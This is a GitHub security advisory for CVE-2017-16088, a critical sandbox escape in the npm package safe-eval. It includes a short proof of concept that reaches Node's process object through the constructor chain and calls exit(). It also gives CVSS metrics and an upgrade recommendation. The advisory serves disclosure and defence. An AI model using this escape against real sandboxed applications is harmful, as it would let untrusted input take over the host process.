Skip to content

Sandbox Breakout in safe-eval

Critical severity GitHub Reviewed Published Jul 18, 2018 to the GitHub Advisory Database • Updated Sep 11, 2023

Package

npm safe-eval (npm)

Affected versions

<= 0.3.0

Patched versions

None

Description

Affected versions of safe-eval are vulnerable to a sandbox escape. By accessing object constructors, un-sanitized user input can access the entire standard library and effectively break out of the sandbox.

Proof of Concept:

This code accesses the process object and calls .exit()

var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");

Recommendation

Update to version 0.4.0 or later

References

Published to the GitHub Advisory Database Jul 18, 2018
Reviewed Jun 16, 2020
Last updated Sep 11, 2023

Severity

Critical
10.0
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Weaknesses

CVE ID

CVE-2017-16088

GHSA ID

GHSA-ww6v-677g-p656

Source code

No known source code
Checking history
See something to contribute? Suggest improvements for this vulnerability.